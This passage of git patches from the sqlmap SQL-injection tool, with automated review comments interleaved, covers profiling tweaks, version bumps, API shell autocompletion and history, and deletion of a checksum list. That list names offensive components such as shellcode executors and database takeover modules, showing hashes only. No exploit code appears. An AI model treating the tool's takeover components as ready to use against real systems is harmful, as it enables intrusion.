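Review bot: The new `except OSError` around `pydotGraph.write_png` assumes a missing Graphviz `dot` binary surfaces as OSError; depending on the pydot version in use it may raise its own exception type instead, in which case the friendly hint never appears, so this is worth confirming against the pydot sqlmap actually loads and widening the clause if needed. The hint is also Debian-specific; a neutral wording such as `errMsg += "(Hint: install the Graphviz 'dot' executable, e.g. 'sudo apt-get install graphviz')"` serves other platforms. After logging, `profile` falls through and returns normally, so the caller cannot tell that no image was produced; `profile` begins outside the hunk.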
@@ -143,10 +143,7 @@ def main(): if not conf.updateAll: # Postponed imports (faster start) - if conf.profile: - from lib.core.profiling import profile - profile() - elif conf.smokeTest: + if conf.smokeTest: from lib.core.testing import smokeTest smokeTest() elif conf.liveTest: @@ -154,15 +151,20 @@ def main(): liveTest() else: from lib.controller.controller import start - try: - start() - except thread.error as ex: - if "can't start new thread" in getSafeExString(ex): - errMsg = "unable to start new threads. Please check OS (u)limits" - logger.critical(errMsg) - raise SystemExit - else: - raise + if conf.profile: + from lib.core.profiling import profile + globals()["start"] = start + profile() + else: + try: + start() + except thread.error as ex: + if "can't start new thread" in getSafeExString(ex): + errMsg = "unable to start new threads. Please check OS (u)limits" + logger.critical(errMsg) + raise SystemExit + else: + raise except SqlmapUserQuitException: errMsg = "user quit" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 71f30de8d26..47f7e6b5955 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -43,12 +43,12 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py d2672b24ffa985523066613138fccbbd lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py +945b313b8bb9713f570f5ebb05416799 lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -eceda1743cad3fb421344c19ab4148ed lib/core/settings.py +e5a223ce6a904c33c896cc6a6161eb01 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py 
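Review bot: In the new profiling branch `start()` runs inside `profile()` outside the `try/except thread.error` that the non-profiling branch keeps, so the "unable to start new threads" diagnostic is lost under `--profile`; if that is acceptable, a short comment should say so. `globals()["start"] = start` also deserves a why-comment, since it only makes sense if `profile()` runs `start()` by name from this module's namespace (presumably via a string-based profiler entry point): `# profile() executes start() by name from this module's globals, so expose the late import there`. `main` begins and ends outside the hunk.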
@@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -c5ecca109867f7ce4d325f487cf7badd sqlmap.py +b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 717c451b8c494041b782ccfea7327ccc82588760 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 15:21:42 +0200 Subject: [PATCH 180/428] Trivial style update --- lib/core/profiling.py | 2 +- lib/core/settings.py | 2 +- lib/parse/payloads.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/profiling.py b/lib/core/profiling.py index ec04b59c0ae..def2b2af3c0 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -50,7 +50,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): if os.path.exists(imageOutputFile): os.remove(imageOutputFile) - infoMsg = "profiling the execution into file %s" % profileOutputFile + infoMsg = "profiling the execution into file '%s'" % profileOutputFile logger.info(infoMsg) # Start sqlmap main function and generate a raw profile file diff --git a/lib/core/settings.py b/lib/core/settings.py index 7003b500f01..f9bacb13c8a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.29" +VERSION = "1.2.6.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index 0eda511951f..ee4d8573d13 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -36,7 +36,7 @@ def cleanupVals(text, tag): return text def parseXmlNode(node): - for element in node.getiterator('boundary'): + for element in node.getiterator("boundary"): boundary = AttribDict() for child in element.getchildren(): @@ -48,7 +48,7 @@ def parseXmlNode(node): conf.boundaries.append(boundary) - for element in node.getiterator('test'): + for element in node.getiterator("test"): test = AttribDict() for child in element.getchildren(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 47f7e6b5955..097007740b0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -43,12 +43,12 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py d2672b24ffa985523066613138fccbbd lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -945b313b8bb9713f570f5ebb05416799 lib/core/profiling.py +6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e5a223ce6a904c33c896cc6a6161eb01 lib/core/settings.py +4a7888756dc009a582de9f4ed7dfd683 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py 
@@ -65,7 +65,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py +f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py From 72ff6e24ff423e6c71a422efeec15dc178825d3e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 17:15:35 +0200 Subject: [PATCH 181/428] Minor wording update --- lib/core/settings.py | 2 +- lib/utils/api.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f9bacb13c8a..e6414d6aa65 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.30" +VERSION = "1.2.6.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index ee0cab9c71a..9da094f0a68 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py 
@@ -687,7 +687,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST except ImportError: if adapter.lower() not in server_names: errMsg = "Adapter '%s' is unknown. " % adapter - errMsg += "(Note: available adapters '%s')" % ', '.join(sorted(server_names.keys())) + errMsg += "List of supported adapters: %s" % ', '.join(sorted(server_names.keys())) else: errMsg = "Server support for adapter '%s' is not installed on this system " % adapter errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 097007740b0..abba562446d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4a7888756dc009a582de9f4ed7dfd683 lib/core/settings.py +09e31da3cc7ba29d6d2cf251284df707 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -100,7 +100,7 @@ f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -ecedf10e09525ac4be07bd27cbd31d81 lib/utils/api.py +bec403b9c2816c96ae4cac87dff70bbe lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py From 27ff5d6fec3066821f5bac06d623f415d686edb2 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Wed, 20 Jun 2018 23:04:58 +0200 Subject: [PATCH 182/428] Implementation of #3156 --- lib/core/common.py | 1 + lib/core/enums.py | 1 + lib/core/settings.py | 2 +- lib/core/shell.py | 4 ++++ lib/utils/api.py | 8 ++++++++ txt/checksum.md5 | 10 +++++----- 6 files changed, 20 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 36f10c25f93..ac6bc7b7a26 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1274,6 +1274,7 @@ def setPaths(rootPath): paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") # sqlmap files + paths.API_SHELL_HISTORY = os.path.join(_, "api.hst") paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst") paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst") paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst") diff --git a/lib/core/enums.py b/lib/core/enums.py index 638b80bbb63..a1a45007129 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -382,6 +382,7 @@ class AUTOCOMPLETE_TYPE: SQL = 0 OS = 1 SQLMAP = 2 + API = 3 class NOTE: FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" diff --git a/lib/core/settings.py b/lib/core/settings.py index e6414d6aa65..28ae3253d0b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.32" +VERSION = "1.2.6.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/shell.py b/lib/core/shell.py index 3920d68f99e..7eeef4ee5c7 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py 
@@ -60,6 +60,8 @@ def saveHistory(completion=None): historyPath = paths.SQL_SHELL_HISTORY elif completion == AUTOCOMPLETE_TYPE.OS: historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY else: historyPath = paths.SQLMAP_SHELL_HISTORY @@ -86,6 +88,8 @@ def loadHistory(completion=None): historyPath = paths.SQL_SHELL_HISTORY elif completion == AUTOCOMPLETE_TYPE.OS: historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY else: historyPath = paths.SQLMAP_SHELL_HISTORY diff --git a/lib/utils/api.py b/lib/utils/api.py index 9da094f0a68..543aa75e96c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -33,6 +33,7 @@ from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults +from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import CONTENT_STATUS from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PART_RUN_CONTENT_TYPES @@ -43,6 +44,10 @@ from lib.core.settings import IS_WIN from lib.core.settings import RESTAPI_DEFAULT_ADDRESS from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.shell import autoCompletion +from lib.core.shell import clearHistory +from lib.core.shell import loadHistory +from lib.core.shell import saveHistory from lib.core.subprocessng import Popen from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error @@ -741,6 +746,9 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non logger.critical(errMsg) return + commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "exit", "bye", "quit") + autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) + taskid = None logger.info("Type 'help' or '?' for list of available commands") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index abba562446d..65e2aed58ae 100644 
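Review bot: The import hunk brings in `clearHistory`, `loadHistory` and `saveHistory` from `lib.core.shell`, but the only new call visible in this patch is `autoCompletion(...)`; if those three are not used elsewhere in `client()` or the module, the imports are dead and should be dropped (or the history load/save wiring they hint at is missing). This is inferred from the visible hunks only, so worth a quick check of the rest of the file.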
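Review bot: The `commands` tuple is rebuilt inside `client()` on every call and duplicates the names the command dispatcher further down presumably matches on, so the completion list and the handlers can drift apart; hoist it to a module-level constant such as `API_SHELL_COMMANDS` and reference it from both places. Since this commit gives the API shell its own history file (`paths.API_SHELL_HISTORY`, `api.hst`) and `new` accepts full sqlmap option strings, any `--auth-cred` or `--proxy-cred` values typed at this prompt will presumably be persisted to disk like the other shells' history; a comment here, or a line in the `help` output, should make that explicit. `client` begins and ends outside the hunk.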
--- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -e9ea20ebda48080ff80f4b87b0085e6c lib/core/common.py +6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -36,7 +36,7 @@ e9ea20ebda48080ff80f4b87b0085e6c lib/core/common.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py f92abf47b2a41b75cd4b89ff0c93194c lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py -bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py +afca5fd7ec20d29c30522a007cf3160f lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -48,8 +48,8 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -09e31da3cc7ba29d6d2cf251284df707 lib/core/settings.py -0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py +0b3afef34882e0bf9bf8149cd672aa22 lib/core/settings.py +dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py 
@@ -100,7 +100,7 @@ f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -bec403b9c2816c96ae4cac87dff70bbe lib/utils/api.py +02321950c18e08b9422c49d389665946 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py From 29aaec8925e40aa55891e4458788c4d586116007 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 23:09:23 +0200 Subject: [PATCH 183/428] First part of checksum cleanup --- txt/checksum.md5 | 477 ----------------------------------------------- 1 file changed, 477 deletions(-) delete mode 100644 txt/checksum.md5 diff --git a/txt/checksum.md5 b/txt/checksum.md5 deleted file mode 100644 index 65e2aed58ae..00000000000 --- a/txt/checksum.md5 +++ /dev/null 
@@ -1,477 +0,0 @@ -4cb52d99ae953f04fb0f17825b0dabc4 extra/beep/beep.py -1e5532ede194ac9c083891c2f02bca93 extra/beep/__init__.py -b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py -1e5532ede194ac9c083891c2f02bca93 extra/cloak/__init__.py -e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py -1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py -acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ -708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py -2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py -1e5532ede194ac9c083891c2f02bca93 extra/__init__.py -fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py -ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ -1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py -b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py -d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ -2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ -c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ -220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py -e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py -71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py -1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py -1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py -b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py -0f581182871148b0456a691ae85b04c0 lib/controller/action.py -94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py -c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py -c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py -1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py -fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py -0d082da16c388b3445e656e0760fb582 lib/core/convert.py -9f87391b6a3395f7f50830b391264f27 
lib/core/data.py -72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -4086fb55f42e27de5330505605baad0f lib/core/decorators.py -fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -f92abf47b2a41b75cd4b89ff0c93194c lib/core/dicts.py -9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py -afca5fd7ec20d29c30522a007cf3160f lib/core/enums.py -cada93357a7321655927fc9625b3bfec lib/core/exception.py -1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py -458a194764805cd8312c14ecd4be4d1e lib/core/log.py -e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -d2672b24ffa985523066613138fccbbd lib/core/option.py -c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -6783160150b4711d02c56ee2beadffdb lib/core/profiling.py -6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py -0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py -a7db43859b61569b601b97f187dd31c5 lib/core/revision.py -fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0b3afef34882e0bf9bf8149cd672aa22 lib/core/settings.py -dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py -a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py -72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -de9922a29c71a235cb95a916ff925db2 lib/core/threads.py -c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -9d395b143be295a143eb5c9b926f3569 lib/core/update.py -e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py -1e5532ede194ac9c083891c2f02bca93 lib/__init__.py -7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py -fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py -3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py -1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py -1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py -492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 
-30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -2b81435f5a7519298c15c724e3194a0d lib/request/basic.py -c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -1b5491cc079384f08cbc6b397786e1af lib/request/connect.py -dd4598675027fae99f2e2475b05986da lib/request/direct.py -2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py -98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py -1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py -aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py -51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py -2c3774b72586985719035b195f144d7b lib/request/rangehandler.py -aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py -7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py -747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py -acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py -1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py -fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py -48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py -f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py -4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py -799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py -48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py -1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -11ecf2effbe9f40b361843d546c3c521 
lib/techniques/union/use.py -02321950c18e08b9422c49d389665946 lib/utils/api.py -37dfb641358669f62c2acedff241348b lib/utils/brute.py -31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py -de9620f03231d8329ee8434884b6bacd lib/utils/deps.py -f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py -7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py -062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py -cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py -011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py -1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py -5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py -0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py -dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py -e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py -b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py -3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py -fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py -e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py -77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py -2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py -4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py -da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py -95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py -82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py -25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py -53bd7de27d37958f543f5329362ac298 
plugins/dbms/firebird/connector.py -bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py -c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py -d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py -c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py -1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py -95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py -616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py -fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py -4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py -7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py -c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py -da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py -35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py -9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py -aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py -25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py -1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py -6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py -ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py -9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py -4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py -e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py 